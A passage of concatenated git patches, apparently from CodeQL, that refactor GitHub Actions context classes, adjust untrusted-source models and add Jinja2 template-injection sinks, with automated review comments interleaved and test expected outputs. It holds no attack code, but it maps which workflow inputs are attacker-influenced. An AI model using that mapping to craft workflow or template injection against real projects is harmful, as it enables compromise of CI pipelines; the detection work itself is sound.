test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... 
| write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | | test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | From ef713ff13bbd387d51e073fff03efde41f814357 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:30:10 +0100 Subject: [PATCH 0935/1267] Extract GitHub context access expression into its own class --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 114 ++++++++++++++------- 2 files changed, 79 insertions(+), 37 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ad7bd67a18c..8c1925f3288 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -379,6 +379,8 @@ class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpression string getInnerExpression() { result = super.getInnerExpression() } } +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e5ad86a226c..e331eff9bd2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1540,25 +1540,27 @@ string getAJsonReferenceAccessPath(string s, int offset) { * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - string expression; - +class SimpleReferenceExpressionImpl extends ExpressionImpl { SimpleReferenceExpressionImpl() { - ( - expression = getASimpleReferenceExpression(this.getFullExpression(), _) - or - exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and - expression = this.getFullExpression() - ) + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) } - override string getExpression() { result = expression } + override string getExpression() { + ( + result = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + result = this.getFullExpression() + ) + } abstract string getFieldName(); abstract AstNodeImpl getTarget(); - override string toString() { result = expression } + override string toString() { result = this.getFullExpression() } } class JsonReferenceExpressionImpl extends ExpressionImpl { 
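Review bot: Dropping `abstract` from `SimpleReferenceExpressionImpl` while keeping `abstract string getFieldName();` and `abstract AstNodeImpl getTarget();` changes which nodes belong to the class: membership is now decided by its own characteristic predicate rather than by the subclasses. An expression that matches the simple- or JSON-reference pattern but none of the context-specific subclasses would then be a member with no field name and no target, which callers of the public `SimpleReferenceExpression` may not expect. If the widening is intended, a class comment such as `Members that match no context-specific subclass have no getFieldName() or getTarget() result.` would make that explicit; if it is not, keeping the class abstract preserves the previous extent. The doc comment above the class also reads `sigcle` where `single` is meant, and the class body continues outside the hunk.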
@@ -1597,6 +1599,44 @@ private string inputsCtxRegex() { private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `secrets` context. * e.g. `${{ secrets.FOO }}` 
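Review bot: `GitHubExpressionImpl` unwraps only `fromjson(...)`, via `regexpCapture("(?i)fromjson\\((.*)\\).*", 1)` in both the characteristic predicate and `getFieldName()`, whereas the Steps, Needs, Jobs, Env and Matrix classes later in this file use `"(?i)(from|to)json\\((.*)\\).*"` with group 2. Unless the simple-reference branch already picks these up (its helper is not visible here), a `toJSON(github.…)` access would not be recognised as a `github` context access, and parts of that context are attacker-influenced, so the gap would surface as missed findings. I would use `expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2)` in both places, and bind the result once in a `string fieldName` field as `SecretsExpressionImpl` does rather than repeating the block. The QLDoc says `accesing` where `accessing` is meant.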
@@ -1607,11 +1647,11 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { SecretsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(secretsCtxRegex()) and fieldName = expr.regexpCapture(secretsCtxRegex(), 1) @@ -1635,11 +1675,11 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { StepsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and 
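Review bot: Replacing the `expression` field with two separate `this.getExpression()` calls decouples the guard from the binding in `SecretsExpressionImpl`: `exists(getASimpleReferenceExpression(this.getExpression(), _))` and `expr = normalizeExpr(this.getExpression())` can now be satisfied by different results whenever `getExpression()` is multi-valued, which its new definition allows if the helper yields more than one match. The same pattern recurs in the Steps, Needs, Jobs, Inputs, Env and Matrix hunks that follow and in the new `GitHubExpressionImpl`. Binding the value once restores the old correlation, for example by opening with `exists(string raw, string expr | raw = this.getExpression() and (` and using `raw` in both branches. The characteristic predicate continues beyond the end of the hunk.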
@@ -1676,11 +1716,11 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { NeedsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(needsCtxRegex()) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -1720,11 +1760,11 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { JobsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and @@ -1752,8 +1792,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -1779,11 +1819,11 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { EnvExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) @@ -1814,11 +1854,11 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { MatrixExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(matrixCtxRegex()) and fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) From 3591db9e9cdfaa05a8b8bf6becb1f1fb83c2cdcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:09 +0100 Subject: [PATCH 0936/1267] Remove artifact source as a source of PR refs --- .../security/UntrustedCheckoutQuery.qll | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 1a75f8a96c1..12a65a52baa 100644 
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -15,8 +15,6 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { ( // remote flow sources - source instanceof ArtifactSource - or source instanceof GitHubCtxSource or source instanceof GitHubEventCtxSource @@ -245,10 +243,14 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(string value, Expression expr | value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) @@ -275,10 +277,14 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(string value, Expression expr | value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) From f3ada4a92b32b6444755339843600b70ba524e6e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:26 +0100 Subject: [PATCH 0937/1267] Update CompositeActionSources expected file --- .../query-tests/Models/CompositeActionsSources.expected | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected index 87c185fb5e1..3be74bb8bf1 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/ql/test/query-tests/Models/CompositeActionsSources.expected 
@@ -1,12 +1,21 @@ edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | 
steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | From f6d20195b1e710240e461d8edd771d978488f073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:33:13 +0100 Subject: [PATCH 0938/1267] When trigger event is not known, do not check context trigger maps --- .../codeql/actions/dataflow/FlowSources.qll | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9259f18f108..df3d513d005 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -31,16 +31,19 @@ abstract class RemoteFlowSource extends SourceNode { class GitHubCtxSource extends RemoteFlowSource { string flag; string event; + GitHubExpression e; GitHubCtxSource() { - exists(Expression e, string context, string context_prefix | - this.asExpr() = e and - context = e.getExpression() and - normalizeExpr(context) = "github.head_ref" and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and - contextTriggerDataModel(event, context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") and - flag = "branch" + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) } @@ -58,15 +61,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or - exists(e.getEnclosingCompositeAction()) + not exists(e.getATriggerEvent()) and + event = "unknown" ) and untrustedEventPropertiesDataModel(regexp, flag) and not flag = "json" and 
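Review bot: In `GitHubCtxSource`, the rewritten characteristic predicate hard-codes `event = "pull_request_target"` where the removed lines resolved the event through `contextTriggerDataModel`. This makes `github.head_ref` a source for that one trigger only, and the set can no longer be adjusted from the data model. GitHub also populates `head_ref` on `pull_request` runs, so if the narrowing is deliberate it should be stated next to the literal, e.g. `// only pull_request_target is treated as a source for head_ref; other PR triggers are excluded on purpose`. The literal `"unknown"` appears here and again in `GitHubEventCtxSource` and `GitHubEventJsonSource`; a one-line comment on what an unresolved trigger means, or a shared predicate, would keep the three branches in step. All three class bodies continue outside their hunks.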
@@ -182,20 +186,24 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or - // github.event is taintes for all triggers + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) and flag = "json" ) From 8647073433cb518fc450ee0ecc504d7b9154a21b Mon Sep 17 00:00:00 2001 
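Review bot: The new third disjunct in `GitHubEventJsonSource`, `not exists(e.getATriggerEvent()) and event = "unknown"`, puts no constraint on `context`, whereas both branches above it end in a `regexpMatch` against `wrapJsonRegexp(...)`. As written, every expression whose trigger cannot be resolved appears to qualify as a `json` source regardless of what it references, which would drown real findings in false positives. Keep a pattern check in that branch as well, e.g. append `and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*")` (and the `wrapJsonRegexp(regexp)` form if individual properties should match too). The new branch also tests `e.getATriggerEvent()` while the other two use `e.getEnclosingWorkflow().getATriggerEvent()`; if those can disagree, some expressions fall into neither case. The predicate continues outside the hunk.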
From: Joe Farebrother Date: Tue, 5 Nov 2024 17:06:53 +0000 Subject: [PATCH 0939/1267] Copy template injection to standard pack + add jinja sinks --- python/ql/lib/semmle/python/Concepts.qll | 26 ++++++++++ .../lib/semmle/python/frameworks/Jinja2.qll | 0 .../TemplateInjectionCustomizations.qll | 50 +++++++++++++++++++ .../dataflow/TemplateInjectionQuery.qll | 22 ++++++++ .../CWE-074/TemplateConstructionConcept.qll | 7 ++- .../TemplateInjectionCustomizations.qll | 4 +- 6 files changed, 106 insertions(+), 3 deletions(-) create mode 100644 python/ql/lib/semmle/python/frameworks/Jinja2.qll create mode 100644 python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll create mode 100644 python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll diff --git a/python/ql/lib/semmle/python/Concepts.qll b/python/ql/lib/semmle/python/Concepts.qll index cc0712d181b..cf6f0214496 100644 --- a/python/ql/lib/semmle/python/Concepts.qll +++ b/python/ql/lib/semmle/python/Concepts.qll 
@@ -861,6 +861,32 @@ class LdapFilterEscaping extends Escaping { LdapFilterEscaping() { super.getKind() = Escaping::getLdapFilterKind() } } +/** + * A data-flow node that constructs a template in a templating engine. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `TemplateConstruction::Range` instead. + */ +class TemplateConstruction extends DataFlow::Node instanceof TemplateConstruction::Range { + /** Gets the argument that specifies the template source. */ + DataFlow::Node getSourceArg() { result = super.getSourceArg() } +} + +/** Provides classes for modelling template construction APIs. */ +module TemplateConstruction { + /** + * A data-flow node that constructs a template in a templating engine. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `TemplateConstruction` instead. + */ + abstract class Range extends DataFlow::Node { + /** Gets the argument that specifies the template source. */ + abstract DataFlow::Node getSourceArg(); + } +} + + /** Provides classes for modeling HTTP-related APIs. */ module Http { /** Gets an HTTP verb, in upper case */ diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll new file mode 100644 index 00000000000..e69de29bb2d diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll new file mode 100644 index 00000000000..e61d5525309 --- /dev/null +++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionCustomizations.qll 
@@ -0,0 +1,50 @@
+/**
+ * Provides default sources, sinks and sanitizers for detecting
+ * "template injection"
+ * vulnerabilities, as well as extension points for adding your own.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.Concepts
+private import semmle.python.dataflow.new.RemoteFlowSources
+private import semmle.python.dataflow.new.BarrierGuards
+
+/**
+ * Provides default sources, sinks and sanitizers for detecting
+ * "template injection"
+ * vulnerabilities, as well as extension points for adding your own.
+ */
+module TemplateInjection {
+ /**
+ * A data flow source for "template injection" vulnerabilities.
+ */
+ abstract class Source extends DataFlow::Node { }
+
+ /**
+ * A data flow sink for "template injection" vulnerabilities.
+ */
+ abstract class Sink extends DataFlow::Node { }
+
+ /**
+ * A sanitizer for "template injection" vulnerabilities.
+ */
+ abstract class Sanitizer extends DataFlow::Node { }
+
+ /**
+ * An active threat-model source, considered as a flow source.
+ */
+ private class ActiveThreatModelSourceAsSource extends Source, ActiveThreatModelSource { }
+
+ /**
+ * A SQL statement of a SQL construction, considered as a flow sink.
+ */
+ class TemplateConstructionAsSink extends Sink {
+ TemplateConstructionAsSink() { this = any(TemplateConstruction c).getSourceArg() }
+ }
+
+ /**
+ * A comparison with a constant, considered as a sanitizer-guard.
+ */
+ class ConstCompareAsSanitizerGuard extends Sanitizer, ConstCompareBarrier { }
+}
diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll
new file mode 100644
index 00000000000..e5ad529fb37
--- /dev/null
+++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll
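Review bot: The QLDoc on `TemplateConstructionAsSink` still reads "A SQL statement of a SQL construction, considered as a flow sink.", which was evidently carried over from the SQL-injection customizations and describes the wrong sink. It should say what the class selects, e.g. `A template source argument of a template construction, considered as a flow sink.` QLDoc is what users see when deciding whether to extend or exclude a sink, so the wrong text matters here.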
@@ -0,0 +1,22 @@ +/** + * Provides a taint-tracking configuration for detecting "template injection" vulnerabilities. + * + * Note, for performance reasons: only import this file if + * `TemplateInjectionFlow` is needed, otherwise + * `TemplateInjectionCustomizations` should be imported instead. + */ + +private import python +import semmle.python.dataflow.new.DataFlow +import semmle.python.dataflow.new.TaintTracking +import TemplateInjectionCustomizations::TemplateInjection + +module TemplateInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node node) { node instanceof Source } + + predicate isSink(DataFlow::Node node) { node instanceof Sink } + + predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } +} + +module TemplateInjectionFlow = TaintTracking::Global; diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll index a20babf15eb..b4f5cae4449 100644 --- a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll @@ -134,7 +134,12 @@ class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallN /** A call to `jinja2.from_string`. */ class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2FromStringConstruction() { - this = API::moduleImport("jinja2").getMember("from_string").getACall() + this = + API::moduleImport("jinja2") + .getMember("Environment") + .getReturn() + .getMember("from_string") + .getACall() } override DataFlow::Node getSourceArg() { result = this.getArg(0) } diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll index 593ca9fee4c..13c70fc7d04 100644 
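Review bot: `TemplateInjectionConfig` registers sanitizers through `isBarrierIn`, which only prohibits flow into a node, so a node that is both a `Source` and a `Sanitizer` still starts a path. Unless that asymmetry is intended, use `predicate isBarrier(DataFlow::Node node) { node instanceof Sanitizer }` so a sanitized value is cut in both directions. `TemplateInjectionConfig` and `TemplateInjectionFlow` also carry no QLDoc of their own; a line such as `/** A taint-tracking configuration for detecting "template injection" vulnerabilities. */` above the config module would document the public entry point.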
--- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll @@ -6,7 +6,7 @@ private import python private import semmle.python.dataflow.new.DataFlow -private import semmle.python.Concepts +private import semmle.python.Concepts as C private import semmle.python.dataflow.new.RemoteFlowSources private import semmle.python.dataflow.new.BarrierGuards private import TemplateConstructionConcept @@ -40,7 +40,7 @@ module TemplateInjection { /** * An active threat-model source, considered as a flow source. */ - private class ActiveThreatModelSourceAsSource extends Source, ActiveThreatModelSource { } + private class ActiveThreatModelSourceAsSource extends Source, C::ActiveThreatModelSource { } /** * A SQL statement of a SQL construction, considered as a flow sink. From 60d8a85a9ccbd5c8099dd925dad7e98057c66c5b Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 6 Nov 2024 09:09:42 +0000 Subject: [PATCH 0940/1267] Promote jinja sinks --- .../lib/semmle/python/frameworks/Jinja2.qll | 49 +++++++++++++++++++ .../CWE-074/TemplateConstructionConcept.qll | 1 + 2 files changed, 50 insertions(+) diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index e69de29bb2d..0b681820f13 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll 
@@ -0,0 +1,49 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `jinja2` PyPI package.
+ * See https://jinja.palletsprojects.com.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+private import semmle.python.frameworks.data.ModelsAsData
+
+module Jinja2 {
+ /** A call to `jinja2.Template`. */
+ class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ Jinja2TemplateConstruction() {
